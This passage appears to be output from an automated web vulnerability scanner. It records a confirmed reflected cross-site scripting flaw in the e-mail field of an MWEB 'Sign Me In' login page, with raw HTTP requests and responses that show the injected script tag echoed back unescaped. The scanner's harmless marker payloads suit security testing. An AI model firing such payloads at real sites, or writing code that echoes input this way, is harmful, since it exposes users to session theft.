<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information"..
Date: Mon, 21 Mar 2011 17:22:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17717
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress=netsparker%40example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000f77)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000F77)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information"..
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| m_authType | GET | 3 |
| m_emailAddress | GET | netsparker@example.com |
| m_failedCount | GET | 3 |
| m_password | GET | 3 |
| m_rememberMe | GET | true |
| m_submitButton | GET | SIGN IN |
| __EVENTTARGET | POST | 3 |
| __EVENTARGUMENT | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUIOTgwMTMwMzhkZHWmTRgiVO MJYlgiy6PMKVGAQqc |
| __EVENTVALIDATION | POST | /wEWBgKp78XzAgL71YatCgKVg63aCAKyn FkAp7Vg EEArqY7psI8A qtvcn NThUQn3khS6hPha0NU= |
| m_emailAddress | POST | '"--></style></script><script>alert(0x000FD5)</script> |
| m_password | POST | 3 |
| m_submitButton | POST | SIGN IN |
| m_failedCount | POST | 3 |
| m_authType | POST | 3 |
Request
POST /authentication.aspx?m_authType=3&m_emailAddress=netsparker@example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN HTTP/1.1
Referer: http://www.signmein.co.za/authentication.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&m_authType=&m_emailAddress=&m_failedCount=&m_password=&m_rememberMe=true&m_submitButton=SIGN+IN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 375
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FD5)%3c%2fscript%3e&m_password=3&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Referer: http://www.signmein.co.za/authentication.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&m_authType=&m_emailAddress=&m_failedCount=&m_password=&m_rememberMe=true&m_submitButton=SIGN+IN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 375
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FD5)%3c%2fscript%3e&m_password=3&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:22:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17717
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress=netsparker%40example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000fd5)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000FD5)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
